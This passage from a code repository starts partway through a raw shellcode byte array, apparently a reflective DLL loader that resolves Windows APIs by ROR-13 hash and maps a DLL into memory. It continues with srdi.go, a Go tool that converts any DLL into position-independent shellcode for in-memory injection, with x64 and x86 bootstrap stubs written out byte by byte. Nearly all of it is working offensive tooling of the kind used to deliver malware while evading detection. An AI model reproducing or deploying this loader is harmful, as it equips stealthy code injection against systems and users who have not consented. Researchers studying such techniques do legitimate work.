0xBE, 0x00, 0x00, 0x00, 0x41, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x48, 0x08, 0xE9, 0x93, 0x00, 0x00, 0x00, 0x45, 0x33, 0xFF, 0x41, 0x8B, 0xD7, 0x44, 0x39, 0x7F, 0x54, 0x0F, 0x86, 0x5D, 0xFF, 0xFF, 0xFF, 0x8B, 0xCA, 0x41, 0x03, 0xD6, 0x8A, 0x04, 0x31, 0x88, 0x04, 0x19, 0x3B, 0x57, 0x54, 0x72, 0xF0, 0xE9, 0x48, 0xFF, 0xFF, 0xFF, 0x41, 0x0F, 0xB7, 0x01, 0x0F, 0xB7, 0xC8, 0x66, 0xC1, 0xE9, 0x0C, 0x66, 0x83, 0xF9, 0x0A, 0x75, 0x11, 0x41, 0x8B, 0x08, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x03, 0xC3, 0x4C, 0x01, 0x14, 0x01, 0xEB, 0x49, 0x66, 0x83, 0xF9, 0x03, 0x75, 0x0E, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x41, 0x8B, 0xC2, 0xEB, 0x2E, 0x66, 0x41, 0x3B, 0xCE, 0x75, 0x15, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x49, 0x8B, 0xC2, 0x48, 0xC1, 0xE8, 0x10, 0x0F, 0xB7, 0xC0, 0xEB, 0x13, 0x66, 0x41, 0x3B, 0xCC, 0x75, 0x14, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x41, 0x0F, 0xB7, 0xC2, 0x41, 0x8B, 0x10, 0x48, 0x01, 0x04, 0x0A, 0x4D, 0x03, 0xCC, 0x41, 0x8B, 0x40, 0x04, 0x49, 0x03, 0xC0, 0x4C, 0x3B, 0xC8, 0x75, 0x86, 0x4D, 0x8B, 0xC1, 0x45, 0x39, 0x39, 0x0F, 0x85, 0x4C, 0xFF, 0xFF, 0xFF, 0x4C, 0x8B, 0x65, 0xB7, 0x44, 0x39, 0xBF, 0x94, 0x00, 0x00, 0x00, 0x0F, 0x84, 0x45, 0x01, 0x00, 0x00, 0x44, 0x8B, 0x87, 0x90, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xEF, 0x4C, 0x03, 0xC3, 0x49, 0x8D, 0x40, 0x0C, 0xEB, 0x07, 0x45, 0x03, 0xEE, 0x48, 0x8D, 0x40, 0x14, 0x44, 0x39, 0x38, 0x75, 0xF4, 0x41, 0x8B, 0xC3, 0x83, 0xE0, 0x04, 0x89, 0x45, 0xB3, 0x0F, 0x84, 0x82, 0x00, 0x00, 0x00, 0x45, 0x3B, 0xEE, 0x76, 0x7D, 0x41, 0xC1, 0xEB, 0x10, 0x45, 0x8D, 0x4D, 0xFF, 0x44, 0x89, 0x5D, 0x7F, 0x45, 0x8B, 0xDF, 0x45, 0x85, 0xC9, 0x74, 0x6F, 0x4D, 0x8B, 0xD0, 0x41, 0x0F, 0x10, 0x02, 0x33, 0xD2, 0x41, 0x8B, 0xCD, 0x41, 0x2B, 0xCB, 0x69, 0xF6, 0xFD, 0x43, 0x03, 0x00, 0xB8, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x33, 0xD2, 0x81, 0xC6, 0xC3, 0x9E, 0x26, 0x00, 0x41, 0x8D, 0x0C, 0x06, 0x8B, 0xC6, 0xC1, 0xE8, 0x10, 0x25, 0xFF, 0x7F, 0x00, 0x00, 0xF7, 0xF1, 0x41, 0x03, 0xC3, 0x45, 0x03, 0xDE, 0x48, 0x8D, 0x0C, 0x80, 0x41, 0x8B, 0x54, 0x88, 0x10, 0x41, 0x0F, 0x10, 0x0C, 0x88, 0x41, 0x0F, 0x11, 0x04, 0x88, 0x41, 0x8B, 0x42, 0x10, 0x41, 0x89, 0x44, 0x88, 0x10, 0x41, 0x0F, 0x11, 0x0A, 0x41, 0x89, 0x52, 0x10, 0x4D, 0x8D, 0x52, 0x14, 0x45, 0x3B, 0xD9, 0x72, 0x9C, 0xEB, 0x06, 0x8B, 0x45, 0xB3, 0x89, 0x45, 0x7F, 0x8B, 0xB7, 0x90, 0x00, 0x00, 0x00, 0x48, 0x03, 0xF3, 0x8B, 0x46, 0x0C, 0x85, 0xC0, 0x74, 0x7B, 0x8B, 0x7D, 0x7F, 0x8B, 0xC8, 0x48, 0x03, 0xCB, 0x41, 0xFF, 0xD4, 0x44, 0x8B, 0x3E, 0x4C, 0x8B, 0xE0, 0x44, 0x8B, 0x76, 0x10, 0x4C, 0x03, 0xFB, 0x4C, 0x03, 0xF3, 0x49, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x74, 0x2D, 0x48, 0x8B, 0x7D, 0xBF, 0x79, 0x05, 0x0F, 0xB7, 0xD1, 0xEB, 0x07, 0x48, 0x8D, 0x51, 0x02, 0x48, 0x03, 0xD3, 0x49, 0x8B, 0xCC, 0xFF, 0xD7, 0x49, 0x83, 0xC7, 0x08, 0x49, 0x89, 0x06, 0x49, 0x83, 0xC6, 0x08, 0x49, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x75, 0xDA, 0x8B, 0x7D, 0x7F, 0x45, 0x33, 0xFF, 0x44, 0x39, 0x7D, 0xB3, 0x74, 0x0F, 0x41, 0x83, 0xFD, 0x01, 0x76, 0x09, 0x69, 0xCF, 0xE8, 0x03, 0x00, 0x00, 0xFF, 0x55, 0xC7, 0x8B, 0x46, 0x20, 0x48, 0x83, 0xC6, 0x14, 0x4C, 0x8B, 0x65, 0xB7, 0x85, 0xC0, 0x75, 0x8C, 0x48, 0x8B, 0x7D, 0xCF, 0x4C, 0x8B, 0x6D, 0xBF, 0x44, 0x39, 0xBF, 0xF4, 0x00, 0x00, 0x00, 0x74, 0x68, 0x44, 0x8B, 0xB7, 0xF0, 0x00, 0x00, 0x00, 0x49, 0x83, 0xC6, 0x04, 0x4C, 0x03, 0xF3, 0xEB, 0x53, 0x41, 0x8B, 0x0E, 0x48, 0x03, 0xCB, 0x41, 0xFF, 0xD4, 0x41, 0x8B, 0x76, 0x08, 0x4C, 0x8B, 0xE0, 0x45, 0x8B, 0x7E, 0x0C, 0x48, 0x03, 0xF3, 0x4C, 0x03, 0xFB, 0xEB, 0x25, 0x49, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x79, 0x05, 0x0F, 0xB7, 0xD1, 0xEB, 0x07, 0x48, 0x8D, 0x51, 0x02, 0x48, 0x03, 0xD3, 0x49, 0x8B, 0xCC, 0x41, 0xFF, 0xD5, 0x48, 0x89, 0x06, 0x48, 0x83, 0xC6, 0x08, 0x49, 0x83, 0xC7, 0x08, 0x33, 0xC0, 0x48, 0x39, 0x06, 0x75, 0xD4, 0x4C, 0x8B, 0x65, 0xB7, 0x49, 0x83, 0xC6, 0x20, 0x45, 0x33, 0xFF, 0x45, 0x39, 0x3E, 0x75, 0xA8, 0x45, 0x8B, 0xF7, 0x0F, 0xB7, 0x47, 0x14, 0x41, 0xBC, 0x01, 0x00, 0x00, 0x00, 0x66, 0x44, 0x3B, 0x7F, 0x06, 0x0F, 0x83, 0xCF, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x7D, 0xD7, 0x48, 0x8D, 0x77, 0x3C, 0x48, 0x03, 0xF0, 0x45, 0x33, 0xC9, 0x44, 0x39, 0x4E, 0xEC, 0x0F, 0x84, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x0E, 0x8B, 0xD1, 0xC1, 0xEA, 0x1E, 0x8B, 0xC1, 0x41, 0x23, 0xD4, 0xC1, 0xE8, 0x1D, 0xC1, 0xE9, 0x1F, 0x41, 0x23, 0xC4, 0x75, 0x24, 0x85, 0xD2, 0x75, 0x0E, 0xF7, 0xD9, 0x45, 0x1B, 0xC0, 0x41, 0x83, 0xE0, 0x07, 0x45, 0x03, 0xC4, 0xEB, 0x4F, 0xF7, 0xD9, 0xB8, 0x02, 0x00, 0x00, 0x00, 0x45, 0x1B, 0xC0, 0x44, 0x23, 0xC0, 0x44, 0x03, 0xC0, 0xEB, 0x3D, 0x85, 0xD2, 0x75, 0x20, 0x85, 0xC9, 0x75, 0x06, 0x44, 0x8D, 0x42, 0x10, 0xEB, 0x2F, 0x85, 0xD2, 0x75, 0x12, 0x85, 0xC9, 0x74, 0x08, 0x41, 0xB8, 0x80, 0x00, 0x00, 0x00, 0xEB, 0x1F, 0x44, 0x8B, 0x45, 0xAF, 0xEB, 0x1D, 0x85, 0xC9, 0x75, 0x06, 0x44, 0x8D, 0x41, 0x20, 0xEB, 0x0F, 0x44, 0x8B, 0x45, 0xAF, 0x85, 0xC9, 0xB8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x0F, 0x45, 0xC0, 0x44, 0x89, 0x45, 0xAF, 0xF7, 0x06, 0x00, 0x00, 0x00, 0x04, 0x74, 0x09, 0x41, 0x0F, 0xBA, 0xE8, 0x09, 0x44, 0x89, 0x45, 0xAF, 0x8B, 0x4E, 0xE8, 0x4C, 0x8D, 0x4D, 0xAF, 0x8B, 0x56, 0xEC, 0x48, 0x03, 0xCB, 0x41, 0xFF, 0xD7, 0x45, 0x33, 0xC9, 0x0F, 0xB7, 0x47, 0x06, 0x45, 0x03, 0xF4, 0x48, 0x83, 0xC6, 0x28, 0x44, 0x3B, 0xF0, 0x0F, 0x82, 0x42, 0xFF, 0xFF, 0xFF, 0x45, 0x33, 0xFF, 0x45, 0x33, 0xC0, 0x33, 0xD2, 0x48, 0x83, 0xC9, 0xFF, 0xFF, 0x55, 0xDF, 0x44, 0x39, 0xBF, 0xD4, 0x00, 0x00, 0x00, 0x74, 0x24, 0x8B, 0x87, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x74, 0x18, 0x18, 0xEB, 0x0F, 0x45, 0x33, 0xC0, 0x41, 0x8B, 0xD4, 0x48, 0x8B, 0xCB, 0xFF, 0xD0, 0x48, 0x8D, 0x76, 0x08, 0x48, 0x8B, 0x06, 0x48, 0x85, 0xC0, 0x75, 0xE9, 0x8B, 0x47, 0x28, 0x4D, 0x8B, 0xC4, 0x48, 0x03, 0xC3, 0x41, 0x8B, 0xD4, 0x48, 0x8B, 0xCB, 0xFF, 0xD0, 0x8B, 0x75, 0x67, 0x85, 0xF6, 0x0F, 0x84, 0x96, 0x00, 0x00, 0x00, 0x44, 0x39, 0xBF, 0x8C, 0x00, 0x00, 0x00, 0x0F, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8B, 0x8F, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xCB, 0x44, 0x8B, 0x59, 0x18, 0x45, 0x85, 0xDB, 0x74, 0x77, 0x44, 0x39, 0x79, 0x14, 0x74, 0x71, 0x44, 0x8B, 0x49, 0x20, 0x41, 0x8B, 0xFF, 0x8B, 0x51, 0x24, 0x4C, 0x03, 0xCB, 0x48, 0x03, 0xD3, 0x45, 0x85, 0xDB, 0x74, 0x5C, 0x45, 0x8B, 0x01, 0x45, 0x8B, 0xD7, 0x4C, 0x03, 0xC3, 0x74, 0x51, 0xEB, 0x10, 0x0F, 0xBE, 0xC0, 0x41, 0x03, 0xC2, 0x44, 0x8B, 0xD0, 0x41, 0xC1, 0xCA, 0x0D, 0x4D, 0x03, 0xC4, 0x41, 0x8A, 0x00, 0x84, 0xC0, 0x75, 0xE9, 0x41, 0x3B, 0xF2, 0x75, 0x05, 0x48, 0x85, 0xD2, 0x75, 0x16, 0xB8, 0x02, 0x00, 0x00, 0x00, 0x41, 0x03, 0xFC, 0x48, 0x03, 0xD0, 0x49, 0x83, 0xC1, 0x04, 0x41, 0x3B, 0xFB, 0x73, 0x1A, 0xEB, 0xBC, 0x8B, 0x49, 0x1C, 0x0F, 0xB7, 0x12, 0x48, 0x03, 0xCB, 0x8B, 0x04, 0x91, 0x8B, 0x55, 0x77, 0x48, 0x03, 0xC3, 0x48, 0x8B, 0x4D, 0x6F, 0xFF, 0xD0, 0x48, 0x8B, 0xC3, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x8B, 0x9C, 0x24, 0xD0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0x5E, 0x5D, 0xC3, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x10, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x8B, 0xF1, 0x48, 0x8B, 0x50, 0x18, 0x4C, 0x8B, 0x4A, 0x10, 0x4D, 0x8B, 0x41, 0x30, 0x4D, 0x85, 0xC0, 0x0F, 0x84, 0xB4, 0x00, 0x00, 0x00, 0x41, 0x0F, 0x10, 0x41, 0x58, 0x49, 0x63, 0x40, 0x3C, 0x33, 0xD2, 0x4D, 0x8B, 0x09, 0xF3, 0x0F, 0x7F, 0x04, 0x24, 0x42, 0x8B, 0x9C, 0x00, 0x88, 0x00, 0x00, 0x00, 0x85, 0xDB, 0x74, 0xD4, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xC1, 0xE8, 0x10, 0x44, 0x0F, 0xB7, 0xD0, 0x45, 0x85, 0xD2, 0x74, 0x21, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x45, 0x8B, 0xDA, 0x0F, 0xBE, 0x01, 0xC1, 0xCA, 0x0D, 0x80, 0x39, 0x61, 0x7C, 0x03, 0x83, 0xC2, 0xE0, 0x03, 0xD0, 0x48, 0xFF, 0xC1, 0x49, 0x83, 0xEB, 0x01, 0x75, 0xE7, 0x4D, 0x8D, 0x14, 0x18, 0x33, 0xC9, 0x41, 0x8B, 0x7A, 0x20, 0x49, 0x03, 0xF8, 0x41, 0x39, 0x4A, 0x18, 0x76, 0x8F, 0x8B, 0x1F, 0x45, 0x33, 0xDB, 0x49, 0x03, 0xD8, 0x48, 0x8D, 0x7F, 0x04, 0x0F, 0xBE, 0x03, 0x48, 0xFF, 0xC3, 0x41, 0xC1, 0xCB, 0x0D, 0x44, 0x03, 0xD8, 0x80, 0x7B, 0xFF, 0x00, 0x75, 0xED, 0x41, 0x8D, 0x04, 0x13, 0x3B, 0xC6, 0x74, 0x0D, 0xFF, 0xC1, 0x41, 0x3B, 0x4A, 0x18, 0x72, 0xD1, 0xE9, 0x5B, 0xFF, 0xFF, 0xFF, 0x41, 0x8B, 0x42, 0x24, 0x03, 0xC9, 0x49, 0x03, 0xC0, 0x0F, 0xB7, 0x14, 0x01, 0x41, 0x8B, 0x4A, 0x1C, 0x49, 0x03, 0xC8, 0x8B, 0x04, 0x91, 0x49, 0x03, 0xC0, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x74, 0x24, 0x28, 0x48, 0x83, 0xC4, 0x10, 0x5F, 0xC3}
17 | )


--------------------------------------------------------------------------------
/srdi.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 | 	"encoding/binary"
  5 | 	"fmt"
  6 | 	"io/ioutil"
  7 | 	"log"
  8 | 	"math"
  9 | 	"os"
 10 | 	"path"
 11 | 	"path/filepath"
 12 | 	"strings"
 13 | )
 14 | 
 15 | func main(){
 16 | 	if len(os.Args)<2 || len(os.Args)>4{
 17 | 		fmt.Println("Args error")
 18 | 		fmt.Println(os.Args[0]+" [dllName] [Args(not necessary)] [entryPoint(not necessary)]")
 19 | 		os.Exit(1)
 20 | 	}
 21 | 	filename :=os.Args[1]
 22 | 	execArgs := ""
 23 | 	if len(os.Args) == 3{
 24 | 		execArgs = os.Args[2]
 25 | 	}
 26 | 	funcName := "blah"
 27 | 	if len(os.Args) == 4{
 28 | 		funcName = os.Args[3]
 29 | 	}
 30 | 	plaintext, err := ioutil.ReadFile(filename)
 31 | 	if err != nil {
 32 | 		log.Panic(err)
 33 | 	}
 34 | 	sc, err:= ShellcodeRDIFromBytes(plaintext,funcName,execArgs)
 35 | 	if err != nil {
 36 | 		log.Panic(err)
 37 | 	}
 38 | 
 39 | 	dir := path.Dir(filename)
 40 | 	outName := strings.Replace(path.Base(filename), ".dll", ".bin", 1)
 41 | 	filePath := filepath.Join(dir, outName)
 42 | 	err = ioutil.WriteFile(filePath, sc, 0700)
 43 | 	if err != nil {
 44 | 		log.Panic(err)
 45 | 	}
 46 | 	fmt.Println(filePath)
 47 | }
 48 | /*
 49 | 
 50 | // ShellcodeRDIToFile generates a sRDI shellcode and writes it to a file
 51 | func ShellcodeRDIToFile(dllPath string, functionName string) (shellcodePath string, err error) {
 52 | 	shellcode, err := ShellcodeRDI(dllPath, functionName, "")
 53 | 	if err != nil {
 54 | 		return "", err
 55 | 	}
 56 | 	dir := path.Dir(dllPath)
 57 | 	filename := strings.Replace(path.Base(dllPath), ".dll", ".bin", 1)
 58 | 	filepath := filepath.Join(dir, filename)
 59 | 	ioutil.WriteFile(filepath, shellcode, 0700)
 60 | 	return filepath, nil
 61 | }
 62 | 
 63 | // ShellcodeRDI generates a reflective shellcode based on a DLL file
 64 | func ShellcodeRDI(dllPath string, functionName string, userdata string) (shellcode []byte, err error) {
 65 | 	// handle command line arguments, -h or -help shows the menu
 66 | 	userDataStr := userdata
 67 | 	clearHeader := true
 68 | 
 69 | 	dllBytes, err := ioutil.ReadFile(dllPath)
 70 | 	if err != nil {
 71 | 		return []byte{}, err
 72 | 	}
 73 | 
 74 | 	// functionHash is 0x10 by default, otherwise get the hash and convert to bytes
 75 | 	var hashFunction []byte
 76 | 	if functionName != "" {
 77 | 		hashFunctionUint32 := hashFunctionName(functionName)
 78 | 		hashFunction = pack(hashFunctionUint32)
 79 | 	} else {
 80 | 		hashFunction = pack(uint32(0x10))
 81 | 	}
 82 | 
 83 | 	flags := 0
 84 | 	if clearHeader {
 85 | 		flags |= 0x1
 86 | 	}
 87 | 	var userData []byte
 88 | 	if userDataStr != "" {
 89 | 		userData = []byte(userDataStr)
 90 | 	}
 91 | 	shellcode = convertToShellcode(dllBytes, hashFunction, userData, flags)
 92 | 	//	err = os.RemoveAll(path.Clean(path.Dir(dllPath) + "/../"))
 93 | 	return shellcode, nil
 94 | 
 95 | }
 96 | 
 97 |  */
 98 | 
 99 | // ShellcodeRDIFromBytes generate a sRDI from a byte array
100 | func ShellcodeRDIFromBytes(data []byte, functionName string, arguments string) (shellcode []byte, err error) {
101 | 
102 | 	clearHeader := true
103 | 	userDataStr := arguments
104 | 
105 | 	// functionHash is 0x10 by default, otherwise get the hash and convert to bytes
106 | 	var hashFunction []byte
107 | 	if functionName != "" {
108 | 		hashFunctionUint32 := hashFunctionName(functionName)
109 | 		hashFunction = pack(hashFunctionUint32)
110 | 	} else {
111 | 		hashFunction = pack(uint32(0x10))
112 | 	}
113 | 
114 | 	flags := 0
115 | 	if clearHeader {
116 | 		flags |= 0x1
117 | 	}
118 | 	var userData []byte
119 | 	if userDataStr != "" {
120 | 		userData = []byte(userDataStr)
121 | 	}
122 | 	shellcode = convertToShellcode(data, hashFunction, userData, flags)
123 | 	return shellcode, nil
124 | }
125 | 
126 | func convertToShellcode(dllBytes, functionHash, userData []byte, flags int) []byte {
127 | 
128 | 	if userData == nil {
129 | 		userData = []byte("None")
130 | 	}
131 | 
132 | 	var final []byte
133 | 
134 | 	if is64BitDLL(dllBytes) {
135 | 		// do 64 bit things
136 | 
137 | 		bootstrapSize := 64
138 | 
139 | 		// call next instruction (Pushes next instruction address to stack)
140 | 		bootstrap := []byte{0xe8, 0x00, 0x00, 0x00, 0x00}
141 | 
142 | 		// Set the offset to our DLL from pop result
143 | 		dllOffset := bootstrapSize - len(bootstrap) + len(rdiShellcode64)
144 | 
145 | 		// pop rcx - Capture our current location in memory
146 | 		bootstrap = append(bootstrap, 0x59)
147 | 
148 | 		// mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
149 | 		bootstrap = append(bootstrap, 0x49, 0x89, 0xc8)
150 | 
151 | 		// add rcx, <Offset of the DLL>
152 | 		bootstrap = append(bootstrap, 0x48, 0x81, 0xc1)
153 | 
154 | 		bootstrap = append(bootstrap, pack(uint32(dllOffset))...)
155 | 
156 | 		// mov edx, <Hash of function>
157 | 		bootstrap = append(bootstrap, 0xba)
158 | 		bootstrap = append(bootstrap, functionHash...)
159 | 
160 | 		// Setup the location of our user data
161 | 		// add r8, <Offset of the DLL> + <Length of DLL>
162 | 		bootstrap = append(bootstrap, 0x49, 0x81, 0xc0)
163 | 		userDataLocation := dllOffset + len(dllBytes)
164 | 		bootstrap = append(bootstrap, pack(uint32(userDataLocation))...)
165 | 
166 | 		// mov r9d, <Length of User Data>
167 | 		bootstrap = append(bootstrap, 0x41, 0xb9)
168 | 		bootstrap = append(bootstrap, pack(uint32(len(userData)))...)
169 | 
170 | 		// push rsi - save original value
171 | 		bootstrap = append(bootstrap, 0x56)
172 | 
173 | 		// mov rsi, rsp - store our current stack pointer for later
174 | 		bootstrap = append(bootstrap, 0x48, 0x89, 0xe6)
175 | 
176 | 		// and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
177 | 		bootstrap = append(bootstrap, 0x48, 0x83, 0xe4, 0xf0)
178 | 
179 | 		// sub rsp, 0x30 - Create some breathing room on the stack
180 | 		bootstrap = append(bootstrap, 0x48, 0x83, 0xec)
181 | 		bootstrap = append(bootstrap, 0x30) // 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
182 | 
183 | 		// mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
184 | 		bootstrap = append(bootstrap, 0xC7, 0x44, 0x24)
185 | 		bootstrap = append(bootstrap, 0x20)
186 | 		bootstrap = append(bootstrap, pack(uint32(flags))...)
187 | 
188 | 		// call - Transfer execution to the RDI
189 | 		bootstrap = append(bootstrap, 0xe8)
190 | 		bootstrap = append(bootstrap, byte(bootstrapSize-len(bootstrap)-4)) // Skip over the remainder of instructions
191 | 		bootstrap = append(bootstrap, 0x00, 0x00, 0x00)
192 | 
193 | 		// mov rsp, rsi - Reset our original stack pointer
194 | 		bootstrap = append(bootstrap, 0x48, 0x89, 0xf4)
195 | 
196 | 		// pop rsi - Put things back where we left them
197 | 		bootstrap = append(bootstrap, 0x5e)
198 | 
199 | 		// ret - return to caller
200 | 		bootstrap = append(bootstrap, 0xc3)
201 | 
202 | 		final = append(bootstrap, rdiShellcode64...)
203 | 		final = append(final, dllBytes...)
204 | 		final = append(final, userData...)
205 | 
206 | 	} else {
207 | 		// do 32 bit things
208 | 
209 | 		bootstrapSize := 45
210 | 
211 | 		// call next instruction (Pushes next instruction address to stack)
212 | 		bootstrap := []byte{0xe8, 0x00, 0x00, 0x00, 0x00}
213 | 
214 | 		// Set the offset to our DLL from pop result
215 | 		dllOffset := bootstrapSize - len(bootstrap) + len(rdiShellcode32)
216 | 
217 | 		// pop eax - Capture our current location in memory
218 | 		bootstrap = append(bootstrap, 0x58)
219 | 
220 | 		// mov ebx, eax - copy our location in memory to ebx before we start modifying eax
221 | 		bootstrap = append(bootstrap, 0x89, 0xc3)
222 | 
223 | 		// add eax, <Offset to the DLL>
224 | 		bootstrap = append(bootstrap, 0x05)
225 | 		bootstrap = append(bootstrap, pack(uint32(dllOffset))...)
226 | 
227 | 		// add ebx, <Offset to the DLL> + <Size of DLL>
228 | 		bootstrap = append(bootstrap, 0x81, 0xc3)
229 | 		userDataLocation := dllOffset + len(dllBytes)
230 | 		bootstrap = append(bootstrap, pack(uint32(userDataLocation))...)
231 | 
232 | 		// push <Flags>
233 | 		bootstrap = append(bootstrap, 0x68)
234 | 		bootstrap = append(bootstrap, pack(uint32(flags))...)
235 | 
236 | 		// push <Length of User Data>
237 | 		bootstrap = append(bootstrap, 0x68)
238 | 		bootstrap = append(bootstrap, pack(uint32(len(userData)))...)
239 | 
240 | 		// push ebx
241 | 		bootstrap = append(bootstrap, 0x53)
242 | 
243 | 		// push <hash of function>
244 | 		bootstrap = append(bootstrap, 0x68)
245 | 		bootstrap = append(bootstrap, functionHash...)
246 | 
247 | 		// push eax
248 | 		bootstrap = append(bootstrap, 0x50)
249 | 
250 | 		// call - Transfer execution to the RDI
251 | 		bootstrap = append(bootstrap, 0xe8)
252 | 		bootstrap = append(bootstrap, byte(bootstrapSize-len(bootstrap)-4)) // Skip over the remainder of instructions
253 | 		bootstrap = append(bootstrap, 0x00, 0x00, 0x00)
254 | 
255 | 		// add esp, 0x14 - correct the stack pointer
256 | 		bootstrap = append(bootstrap, 0x83, 0xc4, 0x14)
257 | 
258 | 		// ret - return to caller
259 | 		bootstrap = append(bootstrap, 0xc3)
260 | 
261 | 		final = append(bootstrap, rdiShellcode32...)
262 | 		final = append(final, dllBytes...)
263 | 		final = append(final, userData...)
264 | 	}
265 | 
266 | 	return final
267 | 
268 | }
269 | 
270 | // helper function similar to struct.pack from python3
271 | func pack(val uint32) []byte {
272 | 	bytes := make([]byte, 4)
273 | 	binary.LittleEndian.PutUint32(bytes, val)
274 | 	return bytes
275 | }
276 | 
277 | // "HelloWorld" = 3571859646
278 | func hashFunctionName(name string) uint32 {
279 | 	function := []byte(name)
280 | 	function = append(function, 0x00)
281 | 
282 | 	functionHash := uint32(0)
283 | 
284 | 	for _, b := range function {
285 | 		functionHash = ror(functionHash, 13, 32)
286 | 		functionHash += uint32(b)
287 | 	}
288 | 
289 | 	return functionHash
290 | }
291 | 
292 | // ROR-13 implementation
293 | func ror(val uint32, rBits uint32, maxBits uint32) uint32 {
294 | 	exp := uint32(math.Exp2(float64(maxBits))) - 1
295 | 	return ((val & exp) >> (rBits % maxBits)) | (val << (maxBits - (rBits % maxBits)) & exp)
296 | }
297 | 
298 | func is64BitDLL(dllBytes []byte) bool {
299 | 	machineIA64 := uint16(512)
300 | 	machineAMD64 := uint16(34404)
301 | 
302 | 	headerOffset := binary.LittleEndian.Uint32(dllBytes[60:64])
303 | 	machine := binary.LittleEndian.Uint16(dllBytes[headerOffset+4 : headerOffset+4+2])
304 | 
305 | 	// 64 bit
306 | 	if machine == machineIA64 || machine == machineAMD64 {
307 | 		return true
308 | 	}
309 | 	return false
310 | }


--------------------------------------------------------------------------------